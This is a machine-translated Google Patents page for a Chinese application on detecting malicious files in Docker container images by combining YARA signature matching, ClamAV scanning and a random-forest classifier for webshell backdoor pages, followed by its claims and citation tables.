CN110210225A - A kind of intelligentized Docker container malicious file detection method and device - Google Patents
A kind of intelligentized Docker container malicious file detection method and device Download PDFInfo
- Publication number
- CN110210225A CN110210225A CN201910445566.8A CN201910445566A CN110210225A CN 110210225 A CN110210225 A CN 110210225A CN 201910445566 A CN201910445566 A CN 201910445566A CN 110210225 A CN110210225 A CN 110210225A
- Authority
- CN
- China
- Prior art keywords
- file
- web page
- testing result
- document
- docker container
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/561—Virus type analysis
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F9/00—Arrangements for program control, e.g. control units
- G06F9/06—Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
- G06F9/44—Arrangements for executing specific programs
- G06F9/455—Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
- G06F9/45533—Hypervisors; Virtual machine monitors
- G06F9/45558—Hypervisor-specific management and integration aspects
Abstract
This application involves field of computer technology, a kind of intelligentized Docker container malicious file detection method and device are provided.The method is applied to server, which comprises obtains multiple files in the original image of target Docker container, the target Docker container is Docker container to be detected;For each file in the multiple file, this document is detected using the malicious file condition code based on yara rule, to judge whether this document is malicious file, obtains the first testing result;For each file in the multiple file, this document is detected using antivirus software, to judge whether this document is malicious file, obtains the second testing result;Obtain multiple web page files in the original image of the target Docker container;For each web page files in the multiple web page files, web page files input Web page classifying model is obtained into third testing result to detect whether the webpage is Webshell webpage backdoor file.
Description
Technical field
This application involves field of computer technology, in particular to a kind of intelligentized Docker container malicious file
Detection method and device.
Background technique
Docker is a container engine dependent on linux kernel, is issued based on Apache2.0 open source authorized agreement,
Automatically dispose of the application program based on container can be fast implemented.Docker is mainly by client, finger daemon, mirror image, appearance
Device and five part of mirror image warehouse composition, provide simply and the modeling pattern of light weight.Wherein, on the one hand mirror image is in object-oriented
Class, be equivalent to template;On the other hand be equivalent to a file system again, required program when in addition to providing container operation, library,
Outside the files such as resource, configuration, some some configuration parameters (such as anonymous volumes, environmental variance, use to prepare when operation are further comprised
Family etc.).And container is the equal of the entity that is created that according to this template of mirror image.
While the rapid development of Docker container technique, Docker vessel safety problem also has become users pass
The focus of note, more and more potential Docker safety problems start to emerge.For mirror image, safety problem is mainly: exploitation
Person is easy to leave down the sensitive information of some database passwords etc when constructing mirror image;Mirror image or society whether from official
The mirror image in area, mirror image itself, which can also have many loopholes, may cause risk.Although mirror image is very high in terms of transmission and deployment
Effect, but also the propagation for the malicious file of virus, back door etc provides convenience.
Summary of the invention
In view of this, the embodiment of the present application provides a kind of intelligentized Docker container malicious file detection method and dress
It sets, it is intended to safety detection be carried out to the original image of Docker container from many aspects, to more thoroughly detect Docker
Malicious file in the original image of container.
The embodiment of the present application first aspect provides a kind of intelligentized Docker container malicious file detection method, described
Method is applied to server, which comprises
Multiple files in the original image of target Docker container are obtained, the target Docker container is to be detected
Docker container;
For each file in the multiple file, using the malicious file condition code based on yara rule to this document
It is detected, to judge whether this document is malicious file, obtains the first testing result;
For each file in the multiple file, this document is detected using antivirus software, to judge this article
Whether part is malicious file, obtains the second testing result;
Obtain multiple web page files in the original image of the target Docker container;
For each web page files in the multiple web page files, which is inputted into Web page classifying model, with
Detect whether the webpage is Webshell webpage backdoor file, obtains third testing result.
Optionally, the method also includes:
Multiple sample web page files are obtained, each sample web page file in the multiple sample web page file carries mark
Note, which characterizes the static nature of the sample web page file, wherein a part in the multiple sample web page file is
Webshell webpage backdoor file;
It is input with the multiple sample web page file, preset model is trained, the Web page classifying model is obtained,
The Web page classifying model is for judging whether single web page files are Webshell webpage backdoor file.
Optionally, the static nature includes at least at least one of following characteristics: comentropy is overlapped index, maximum
Word length, dangerous function number, file compression rate, Eval function number.
Optionally, for each file in the multiple file, the malicious file condition code based on yara rule is utilized
This document is detected, to judge whether this document is malicious file, comprising:
Multiple disclosed malicious file condition codes based on yara rule are obtained, yara rule base is established;
For each file in the multiple file, whether detect in this document comprising the evil in the yara rule base
Meaning file eigenvalue, wherein when this document includes the malicious file condition code in the yara rule base, determine that this document is
Malicious file.
Optionally, the server is connect with client communication;The method also includes:
Receive the original image for the target Docker container that the client is sent;
First testing result, second testing result and the third testing result are sent to the client
End.
Optionally, the server is connect with database communication;The method also includes:
First testing result, second testing result and the third testing result are stored in the data
Library, so that the client obtains first testing result, second testing result and described by the database
Third testing result.
The embodiment of the present application second aspect provides a kind of intelligentized Docker container malicious file detection device, described
Device is applied to server, and described device includes:
First obtains module, multiple files in original image for obtaining target Docker container, the target
Docker container is Docker container to be detected;
First detection module, for utilizing the malice based on yara rule for each file in the multiple file
File eigenvalue detects this document, to judge whether this document is malicious file, obtains the first testing result;
Second detection module, for for each file in the multiple file, using antivirus software to this document into
Row detection, to judge whether this document is malicious file, obtains the second testing result;
Second obtains module, multiple web page files in original image for obtaining the target Docker container;
Third detection module, each web page files for being directed in the multiple web page files are defeated by the web page files
Enter webpage disaggregated model, to detect whether the webpage is Webshell webpage backdoor file, obtains third testing result.
Optionally, described device further include:
Third obtains module, each sample for obtaining multiple sample web page files, in the multiple sample web page file
This web page files carries label, which characterizes the static nature of the sample web page file, wherein the multiple sample web page text
A part in part is Webshell webpage backdoor file;
Training module is trained preset model, obtains described for being input with the multiple sample web page file
Web page classifying model, the Web page classifying model is for judging whether single web page files are Webshell webpage backdoor file.
Optionally, the first detection module includes:
Setting up submodule establishes yara rule for obtaining multiple disclosed malicious file condition codes based on yara rule
Then library;
Detection sub-module, whether for each file in the multiple file, detecting in this document includes the yara
Malicious file condition code in rule base, wherein when this document includes the malicious file condition code in the yara rule base,
Determine that this document is malicious file.
Optionally, the server is connect with client communication, described device further include:
Receiving module, for receiving the original image for the target Docker container that the client is sent;
Sending module is used for first testing result, second testing result and the third testing result
It is sent to the client.
Using intelligentized Docker container malicious file detection method provided by the embodiments of the present application, server is directed to mesh
Multiple files in the original image of Docker container are marked, it is examined using the malicious file condition code based on yara rule
Survey, and it detected using antivirus software, web page files are also inputted into Web page classifying model, with detect the webpage whether be
Webshell webpage backdoor file.
On the one hand, server is for multiple files in the original image of target Docker container, from multidimensional angle to it
It is detected, specifically, using a variety of detection means such as malicious file condition code, antivirus software and Web page classifying models to it
It is detected, every kind of detection means can detect the malicious file that the means are coped with, so as to more thoroughly detect
Malicious file in the original image of Docker container.
On the other hand, the detection means such as server by utilizing malicious file condition code and antivirus software hold target Docker
When multiple files in the original image of device are detected, known malicious file can be detected.And for current unknown evil
Meaning file, this detection means of server by utilizing Web page classifying model, to multiple in the original image of target Docker container
File is detected, to predict current unknown malicious file.To realize server to current unknown malicious file
Intelligent measurement, improve the reliability of the detection function of server.
Detailed description of the invention
Technical solution in ord to more clearly illustrate embodiments of the present application, below by institute in the description to the embodiment of the present application
Attached drawing to be used is needed to be briefly described, it should be apparent that, the accompanying drawings in the following description is only some implementations of the application
Example, for those of ordinary skill in the art, without any creative labor, can also be according to these attached drawings
Obtain other attached drawings.
Fig. 1 is the flow chart for the intelligentized Docker container malicious file detection method that one embodiment of the application proposes;
Fig. 2 is the flow chart for the training method to Web page classifying model that one embodiment of the application proposes;
Fig. 3 is the schematic diagram for the intelligentized Docker container malicious file detection device that one embodiment of the application provides.
Specific embodiment
Below in conjunction with the attached drawing in the embodiment of the present application, technical solutions in the embodiments of the present application carries out clear, complete
Site preparation description, it is clear that described embodiment is some embodiments of the present application, instead of all the embodiments.Based on this Shen
Please in embodiment, every other implementation obtained by those of ordinary skill in the art without making creative efforts
Example, shall fall in the protection scope of this application.
It is the intelligentized Docker container malicious file detection method that one embodiment of the application proposes with reference to Fig. 1, Fig. 1
Flow chart, this method are applied to server.As shown in Figure 1, method includes the following steps:
S11: obtaining multiple files in the original image of target Docker container, and the target Docker container is to be checked
The Docker container of survey.
In the present embodiment, the original image of target Docker container refers to: being utilized when creating target Docker container
Mirror image.
In the present embodiment, server can be connect with client communication, and server can be sent by receiving the client
The target Docker container original image, to obtain the original image of the target Docker container.Server pair
Acquired original image decompression, and then get multiple files in original image.Since server is connect with client, clothes
Business device receives the original image for the target Docker container that client is sent, to hold to the Docker in client home environment
Device safety is detected, on the one hand, client can by server to the Docker container security in home environment into
Row detection, host where client need not execute detection operation, reduce client operating pressure.On the other hand, server can be with
Arrangement is collected to the malicious file detected in original image transmitted by multiple client, to further increase server
The detectability of itself.
Illustratively, client provides a user the interface UI (User Interface), and detects home environment (i.e. client
Host where end) in mirror image, the mirror image that the machine is downloaded is presented to the user by client in the form of a list.Client, which receives, to be used
Selection of the family to certain mirror images, and mirror image selected by user is transmitted to server.After the mirror image of packing is transmitted, clothes
Business device returns to client and sends successful information.When client, which receives, sends successful information, client enters detection
Interface is loaded, while sending the request detected to server.
S12: for each file in the multiple file, using the malicious file condition code based on yara rule to this
File is detected, and to judge whether this document is malicious file, obtains the first testing result.
In the present embodiment, there are how many a malicious files for characterizing in multiple files for the first testing result.
Illustratively, such as each file in multiple files, the malicious file condition code based on yara rule is utilized
After detecting to each file, 2 malicious files are detected in total, then first testing result can be " 2 ".Alternatively, the
One testing result is presented in a manner of scoring safely, such as full marks are 100 points, and one malicious file of every detection deducts 10 points, example
Such as each file in multiple files, each file is detected using the malicious file condition code based on yara rule
Afterwards, 2 malicious files are detected in total, then the first testing result is " 80 points ".
In the present embodiment, for each file in multiple files, the malicious file feature based on yara rule is utilized
When code detects this document, it may particularly include following steps:
S121: multiple disclosed malicious file condition codes based on yara rule are obtained, yara rule base is established;
S122: whether for each file in the multiple file, detecting in this document includes the yara rule base
In malicious file condition code, wherein this document include the yara rule base in malicious file condition code when, determine should
File is malicious file.
Illustratively, server obtains the spy of the malicious file based on yara rule from multiple disclosed yara Rule Information sources
Code is levied, to establish the local yara rule base of server oneself.For each file in the multiple file, server is directed to
The condition code of this document is matched one by one with multiple malicious file condition codes in the yara rule base of local, when this feature code with
When a certain malicious file condition code matches, i.e., the malicious file condition code in yara rule base is contained in this document, it is determined that
This document is malicious file.
S13: for each file in the multiple file, detecting this document using antivirus software, with judgement
Whether this document is malicious file, obtains the second testing result.
In the present embodiment, there are how many a malicious files for characterizing in multiple files for the second testing result.
Illustratively, such as each file in multiple files, after being detected using antivirus software to this document, always
1 malicious file is detected altogether, then second testing result can be " 1 ".Alternatively, side of second testing result to score safely
Formula is presented, such as full marks are 100 points, and one malicious file of every detection deducts 10 points, such as each text in multiple files
Part after detecting using antivirus software to this document, detects 1 malicious file, then the second testing result is " 90 in total
Point ".
Illustratively, for each file in multiple files, server by utilizing increases income antivirus software ClamAV successively to text
Part is detected, and obtains the output information of open source antivirus software ClamAV, to realize the detection to malicious file.Open source antivirus
Software ClamAV can farthest have found malicious file present in multiple files of the original image of Docker container, have
Help realize the automatic identification to the known malicious file such as known sample and backdoor programs.
S14: multiple web page files in the original image of the target Docker container are obtained.
In the present embodiment, server can be connect with client communication, and server can be sent by receiving the client
The target Docker container original image, to obtain the original image of the target Docker container.Server pair
Acquired original image decompression, to get the All Files in original image.Server is from wherein filtering out the mesh
Mark all web page files in the original image of Docker container.
S15: for each web page files in the multiple web page files, which is inputted into Web page classifying mould
Type obtains third testing result to detect whether the webpage is Webshell webpage backdoor file.
In the present embodiment, there are after how many a Webshell webpages for characterizing in multiple web page files for third testing result
Door file.
Illustratively, such as each web page files in multiple web page files, using Web page classifying model to the webpage
After file is detected, 2 Webshell webpage backdoor files are detected in total, then the third testing result can be " 2 ".Or
Person, third testing result are presented in a manner of scoring safely, such as full marks are 100 points, after one Webshell webpage of every detection
Door file, deducts 10 points, such as each web page files in multiple web page files, using Web page classifying model to the webpage
After file is detected, 2 Webshell webpage backdoor files are detected in total, then third testing result is " 80 points ".
In the present embodiment, Web page classifying model is obtained from first passing through training in advance to preset model.When training, obtain more
A sample web page file, each sample web page file in the multiple sample web page file carry label, and label characterization should
The static nature of sample web page file, wherein a part in the multiple sample web page file is Webshell webpage back door
File;It is input with the multiple sample web page file, preset model is trained, the Web page classifying model, institute are obtained
Web page classifying model is stated for judging whether single web page files are Webshell webpage backdoor file.Wherein, described static special
Sign includes at least at least one of following characteristics: comentropy is overlapped index, maximum word length, dangerous function number, file
The number of compression ratio, Eval function (function in program language).
It is the flow chart for the training method to Web page classifying model that one embodiment of the application proposes with reference to Fig. 2, Fig. 2.Tool
Body collects number multiple Webshell webpage backdoor file samples and multiple normal web page files samples in training, from every
Manual extraction goes out the effective static nature of malicious file in a sample, and such as comentropy is overlapped index, maximum word length, activation
Function number, file compression rate, Eval function numbers etc. form eigenmatrix, using eigenmatrix as the input data of model,
Using random forests algorithm training preset model, Web page classifying model is obtained.Server is by Web page classifying model realization pair
The detection of unknown malicious file in the original image of Docker container.
The present embodiment is using machine learning techniques to the web page files other than yara rule base and antivirus software sphere of action
It is predicted, more comprehensively can thoroughly detect the Webshell webpage that can't detect based on yara rule base and antivirus software
Backdoor file, the recall rate of the further high safety problem to target Docker container.
In the above-mentioned method including step S11 to step S15, step S11 to step S13 embodies server can be from multiple
The function of known malicious file is detected in file, step S14 to step S15 embodies server can be from multiple web page files
In detect the function of unknown Webshell webpage backdoor file.
Using the above-mentioned method including step S11 to step S15, on the one hand, server is for target Docker container
Multiple files in original image utilize a variety of detection hands such as malicious file condition code, antivirus software and Web page classifying model
Section detects it, and every kind of detection means can detect the malicious file that the means are coped with, so as to more thoroughly examine
Measure the malicious file in the original image of Docker container.
On the other hand, the detection means such as server by utilizing malicious file condition code and antivirus software hold target Docker
When multiple files in the original image of device are detected, known malicious file can be detected.And for current unknown evil
Meaning file, this detection means of server by utilizing Web page classifying model, to multiple in the original image of target Docker container
File is detected, to predict current unknown malicious file.To realize server to current unknown malicious file
Intelligent measurement, improve the reliability of the detection function of server.
Server is in the first testing result, the second testing result and the third obtained by step S11 to step S15
After testing result, first testing result, second testing result and the third testing result are also sent to visitor
Family end.
In addition, server can also be connect with database communication, server will after step S11 to step S15 gained
The first testing result, the second testing result and the third testing result deposit database arrived, so that client can pass through data
Library obtains static detection result, the first dynamic detection result, the second dynamic detection result and third dynamic detection result.
Based on the same inventive concept, one embodiment of the application provides a kind of intelligentized Docker container malicious file detection
Device.It is showing for the intelligentized Docker container malicious file detection device that one embodiment of the application provides with reference to Fig. 3, Fig. 3
It is intended to.As shown in figure 3, the device includes:
First obtains module 31, multiple files in original image for obtaining target Docker container, the target
Docker container is Docker container to be detected;
First detection module 32, for utilizing the evil based on yara rule for each file in the multiple file
Meaning file eigenvalue detects this document, to judge whether this document is malicious file, obtains the first testing result;
Second detection module 33, each file for being directed in the multiple file, using antivirus software to this document
It is detected, to judge whether this document is malicious file, obtains the second testing result;
Second obtains module 34, multiple web page files in original image for obtaining the target Docker container;
Third detection module 35, each web page files for being directed in the multiple web page files, by the web page files
It inputs Web page classifying model and obtains third testing result to detect whether the webpage is Webshell webpage backdoor file.
Optionally, described device further include:
Third obtains module, each sample for obtaining multiple sample web page files, in the multiple sample web page file
This web page files carries label, which characterizes the static nature of the sample web page file, wherein the multiple sample web page text
A part in part is Webshell webpage backdoor file;
Training module is trained preset model, obtains described for being input with the multiple sample web page file
Web page classifying model, the Web page classifying model is for judging whether single web page files are Webshell webpage backdoor file.
Optionally, the first detection module includes:
Setting up submodule establishes yara rule for obtaining multiple disclosed malicious file condition codes based on yara rule
Then library;
Detection sub-module, whether for each file in the multiple file, detecting in this document includes the yara
Malicious file condition code in rule base, wherein when this document includes the malicious file condition code in the yara rule base,
Determine that this document is malicious file.
Optionally, the server is connect with client communication, described device further include:
Receiving module, for receiving the original image for the target Docker container that the client is sent;
Sending module is used for first testing result, second testing result and the third testing result
It is sent to the client.
For device embodiment, since it is basically similar to the method embodiment, related so being described relatively simple
Place illustrates referring to the part of embodiment of the method.
All the embodiments in this specification are described in a progressive manner, the highlights of each of the examples are with
The difference of other embodiments, the same or similar parts between the embodiments can be referred to each other.
It should be understood by those skilled in the art that, the embodiments of the present application may be provided as method, apparatus or calculating
Machine program product.Therefore, the embodiment of the present application can be used complete hardware embodiment, complete software embodiment or combine software and
The form of the embodiment of hardware aspect.Moreover, the embodiment of the present application can be used one or more wherein include computer can
With in the computer-usable storage medium (including but not limited to magnetic disk storage, CD-ROM, optical memory etc.) of program code
The form of the computer program product of implementation.
The embodiment of the present application is referring to according to the method for the embodiment of the present application, terminal device (system) and computer program
The flowchart and/or the block diagram of product describes.It should be understood that flowchart and/or the block diagram can be realized by computer program instructions
In each flow and/or block and flowchart and/or the block diagram in process and/or box combination.It can provide these
Computer program instructions are set to general purpose computer, special purpose computer, Embedded Processor or other programmable data processing terminals
Standby processor is to generate a machine, so that being held by the processor of computer or other programmable data processing terminal devices
Capable instruction generates for realizing in one or more flows of the flowchart and/or one or more blocks of the block diagram
The device of specified function.
These computer program instructions, which may also be stored in, is able to guide computer or other programmable data processing terminal devices
In computer-readable memory operate in a specific manner, so that instruction stored in the computer readable memory generates packet
The manufacture of command device is included, which realizes in one side of one or more flows of the flowchart and/or block diagram
The function of being specified in frame or multiple boxes.
These computer program instructions can also be loaded into computer or other programmable data processing terminal devices, so that
Series of operation steps are executed on computer or other programmable terminal equipments to generate computer implemented processing, thus
The instruction executed on computer or other programmable terminal equipments is provided for realizing in one or more flows of the flowchart
And/or in one or more blocks of the block diagram specify function the step of.
Although preferred embodiments of the embodiments of the present application have been described, once a person skilled in the art knows bases
This creative concept, then additional changes and modifications can be made to these embodiments.So the following claims are intended to be interpreted as
Including preferred embodiment and all change and modification within the scope of the embodiments of the present application.
Finally, it is to be noted that, herein, relational terms such as first and second and the like be used merely to by
One entity or operation are distinguished with another entity or operation, without necessarily requiring or implying these entities or operation
Between there are any actual relationship or orders.Moreover, the terms "include", "comprise" or its any other variant meaning
Covering non-exclusive inclusion, so that process, method, article or terminal device including a series of elements not only wrap
Those elements are included, but also including other elements that are not explicitly listed, or further includes for this process, method, article
Or the element that terminal device is intrinsic.In the absence of more restrictions, being wanted by what sentence "including a ..." limited
Element, it is not excluded that there is also other identical elements in process, method, article or the terminal device for including the element.
Above to a kind of intelligentized Docker container malicious file detection method provided herein and device, carry out
It is discussed in detail, specific examples are used herein to illustrate the principle and implementation manner of the present application, above embodiments
Explanation be merely used to help understand the present processes and its core concept;At the same time, for those skilled in the art,
According to the thought of the application, there will be changes in the specific implementation manner and application range, in conclusion in this specification
Hold the limitation that should not be construed as to the application.
Claims (10)
1. a kind of intelligentized Docker container malicious file detection method, which is characterized in that be applied to server, the method
Include:
Multiple files in the original image of target Docker container are obtained, the target Docker container is to be detected
Docker container;
For each file in the multiple file, this document is carried out using the malicious file condition code based on yara rule
Detection, to judge whether this document is malicious file, obtains the first testing result;
For each file in the multiple file, this document is detected using antivirus software, to judge that this document is
No is malicious file, obtains the second testing result;
Obtain multiple web page files in the original image of the target Docker container;
For each web page files in the multiple web page files, which is inputted into Web page classifying model, with detection
Whether the webpage is Webshell webpage backdoor file, obtains third testing result.
2. the method according to claim 1, wherein the method also includes:
Multiple sample web page files are obtained, each sample web page file in the multiple sample web page file carries label, should
Label characterizes the static nature of the sample web page file, wherein a part in the multiple sample web page file is
Webshell webpage backdoor file;
It is input with the multiple sample web page file, preset model is trained, the Web page classifying model is obtained, it is described
Web page classifying model is for judging whether single web page files are Webshell webpage backdoor file.
3. according to the method described in claim 2, it is characterized in that, the static nature includes at least in following characteristics at least
A kind of: comentropy is overlapped index, maximum word length, dangerous function number, file compression rate, Eval function number.
4. the method according to claim 1, wherein utilizing base for each file in the multiple file
This document is detected in the malicious file condition code of yara rule, to judge whether this document is malicious file, comprising:
Multiple disclosed malicious file condition codes based on yara rule are obtained, yara rule base is established;
For each file in the multiple file, whether detect in this document comprising the malice text in the yara rule base
Part condition code, wherein when this document includes the malicious file condition code in the yara rule base, determine that this document is malice
File.
5. method according to any one of claims 1 to 4, which is characterized in that the server is connect with client communication;Institute
State method further include:
Receive the original image for the target Docker container that the client is sent;
First testing result, second testing result and the third testing result are sent to the client.
6. according to the method described in claim 5, it is characterized in that, the server is connect with database communication;The method
Further include:
First testing result, second testing result and the third testing result are stored in the database, with
Make the client obtain first testing result, second testing result and the third by the database to examine
Survey result.
7. a kind of intelligentized Docker container malicious file detection device, which is characterized in that be applied to server, described device
Include:
First obtains module, multiple files in original image for obtaining target Docker container, the target Docker
Container is Docker container to be detected;
First detection module, for utilizing the malicious file based on yara rule for each file in the multiple file
Condition code detects this document, to judge whether this document is malicious file, obtains the first testing result;
Second detection module, for being examined to this document using antivirus software for each file in the multiple file
It surveys, to judge whether this document is malicious file, obtains the second testing result;
Second obtains module, multiple web page files in original image for obtaining the target Docker container;
Third detection module, for for each web page files in the multiple web page files, which to be inputted net
Page disaggregated model obtains third testing result to detect whether the webpage is Webshell webpage backdoor file.
8. device according to claim 7, which is characterized in that described device further include:
Third obtains module, each sample net for obtaining multiple sample web page files, in the multiple sample web page file
Page file carries label, which characterizes the static nature of the sample web page file, wherein in the multiple sample web page file
A part be Webshell webpage backdoor file;
Training module is trained preset model, obtains the webpage for being input with the multiple sample web page file
Disaggregated model, the Web page classifying model is for judging whether single web page files are Webshell webpage backdoor file.
9. device according to claim 7, which is characterized in that the first detection module includes:
Setting up submodule establishes yara rule base for obtaining multiple disclosed malicious file condition codes based on yara rule;
Whether detection sub-module detects in this document for each file in the multiple file comprising the yara rule
Malicious file condition code in library, wherein when this document includes the malicious file condition code in the yara rule base, determine
This document is malicious file.
10. device according to claim 7, which is characterized in that the server is connect with client communication, described device
Further include:
Receiving module, for receiving the original image for the target Docker container that the client is sent;
Sending module, for sending first testing result, second testing result and the third testing result
To the client.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910445566.8A CN110210225A (en) | 2019-05-27 | 2019-05-27 | A kind of intelligentized Docker container malicious file detection method and device |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910445566.8A CN110210225A (en) | 2019-05-27 | 2019-05-27 | A kind of intelligentized Docker container malicious file detection method and device |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN110210225A true CN110210225A (en) | 2019-09-06 |
Family
ID=67788697
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201910445566.8A Pending CN110210225A (en) | 2019-05-27 | 2019-05-27 | A kind of intelligentized Docker container malicious file detection method and device |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110210225A (en) |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110851824A (en) * | 2019-11-13 | 2020-02-28 | 哈尔滨工业大学 | Detection method for malicious container |
| CN112560018A (en) * | 2020-12-23 | 2021-03-26 | 苏州三六零智能安全科技有限公司 | Sample file detection method and device, terminal equipment and storage medium |
| CN113407935A (en) * | 2021-06-16 | 2021-09-17 | 中国光大银行股份有限公司 | File detection method and device, storage medium and server |
Citations (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR20090088687A (en) * | 2008-02-15 | 2009-08-20 | 한국정보보호진흥원 | System for detecting webshell and method thereof |
| KR101080953B1 (en) * | 2011-05-13 | 2011-11-08 | (주)유엠브이기술 | System and method for detecting and protecting webshell in real-time |
| CN107659570A (en) * | 2017-09-29 | 2018-02-02 | 杭州安恒信息技术有限公司 | Webshell detection methods and system based on machine learning and static and dynamic analysis |
| CN109067708A (en) * | 2018-06-29 | 2018-12-21 | 北京奇虎科技有限公司 | A kind of detection method, device, equipment and the storage medium at webpage back door |
| CN109583567A (en) * | 2018-11-29 | 2019-04-05 | 四川大学 | A kind of Web autoscanner fingerprint recognition model based on CNN |
| CN109657467A (en) * | 2018-11-26 | 2019-04-19 | 北京兰云科技有限公司 | A kind of webpage back door detection method and device, computer readable storage medium |
| CN109753798A (en) * | 2018-12-11 | 2019-05-14 | 四川大学 | A kind of Webshell detection model based on random forest and FastText |
| CN109800574A (en) * | 2018-12-12 | 2019-05-24 | 中国人民公安大学 | Computer Virus Detection Method and system based on cryptographic algorithm analysis |
-
2019
- 2019-05-27 CN CN201910445566.8A patent/CN110210225A/en active Pending
Patent Citations (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR20090088687A (en) * | 2008-02-15 | 2009-08-20 | 한국정보보호진흥원 | System for detecting webshell and method thereof |
| KR101080953B1 (en) * | 2011-05-13 | 2011-11-08 | (주)유엠브이기술 | System and method for detecting and protecting webshell in real-time |
| CN107659570A (en) * | 2017-09-29 | 2018-02-02 | 杭州安恒信息技术有限公司 | Webshell detection methods and system based on machine learning and static and dynamic analysis |
| CN109067708A (en) * | 2018-06-29 | 2018-12-21 | 北京奇虎科技有限公司 | A kind of detection method, device, equipment and the storage medium at webpage back door |
| CN109657467A (en) * | 2018-11-26 | 2019-04-19 | 北京兰云科技有限公司 | A kind of webpage back door detection method and device, computer readable storage medium |
| CN109583567A (en) * | 2018-11-29 | 2019-04-05 | 四川大学 | A kind of Web autoscanner fingerprint recognition model based on CNN |
| CN109753798A (en) * | 2018-12-11 | 2019-05-14 | 四川大学 | A kind of Webshell detection model based on random forest and FastText |
| CN109800574A (en) * | 2018-12-12 | 2019-05-24 | 中国人民公安大学 | Computer Virus Detection Method and system based on cryptographic algorithm analysis |
Non-Patent Citations (1)
| Title |
|---|
| LOVEYOUYOU: ""Docker镜像扫描器的实现"", 《公众号名称为"REEBUF"的微信公众平台》 * |
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110851824A (en) * | 2019-11-13 | 2020-02-28 | 哈尔滨工业大学 | Detection method for malicious container |
| CN112560018A (en) * | 2020-12-23 | 2021-03-26 | 苏州三六零智能安全科技有限公司 | Sample file detection method and device, terminal equipment and storage medium |
| CN112560018B (en) * | 2020-12-23 | 2023-10-31 | 苏州三六零智能安全科技有限公司 | Sample file detection method, device, terminal equipment and storage medium |
| CN113407935A (en) * | 2021-06-16 | 2021-09-17 | 中国光大银行股份有限公司 | File detection method and device, storage medium and server |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10402817B1 (en) | Relaxed fraud detection for transactions using virtual transaction cards | |
| US11570211B1 (en) | Detection of phishing attacks using similarity analysis | |
| CN109376078B (en) | Mobile application testing method, terminal equipment and medium | |
| CN106161342B (en) | The dynamic optimization of safety applications | |
| US11509667B2 (en) | Predictive internet resource reputation assessment | |
| Li et al. | Block: a black-box approach for detection of state violation attacks towards web applications | |
| CN107659570A (en) | Webshell detection methods and system based on machine learning and static and dynamic analysis | |
| CN110210225A (en) | A kind of intelligentized Docker container malicious file detection method and device | |
| CN104980404B (en) | Method and system for protecting account information security | |
| CN105793862B (en) | Dynamic routine is guided execution in isolation environment | |
| JPWO2018235252A1 (en) | Analyzing device, log analyzing method, and analyzing program | |
| CN106022112A (en) | Configuring a sandbox environment for malware testing | |
| CN108009425A (en) | File detects and threat level decision method, apparatus and system | |
| KR101858620B1 (en) | Device and method for analyzing javascript using machine learning | |
| US20180074818A1 (en) | Source code mapping through context specific key word indexes and fingerprinting | |
| CN110516173B (en) | Illegal network station identification method, illegal network station identification device, illegal network station identification equipment and illegal network station identification medium | |
| KR20190031030A (en) | Method and system for identifying an open source software package based on binary files | |
| CN107392028A (en) | The detection method and its detection means of sensitive information, storage medium, electronic equipment | |
| US11550707B2 (en) | Systems and methods for generating and executing a test case plan for a software product | |
| CN106030527B (en) | By the system and method for application notification user available for download | |
| CN114036501A (en) | APP detection method, system, device, equipment and storage medium | |
| US10817601B2 (en) | Hypervisor enforcement of cryptographic policy | |
| KR101115250B1 (en) | Apparatus and method for checking safety of qr code | |
| KR20160031589A (en) | Malicious application detecting method and computer program executing the method | |
| CN109582560A (en) | Test file edit methods, device, equipment and computer readable storage medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20190906 |
|
| RJ01 | Rejection of invention patent application after publication |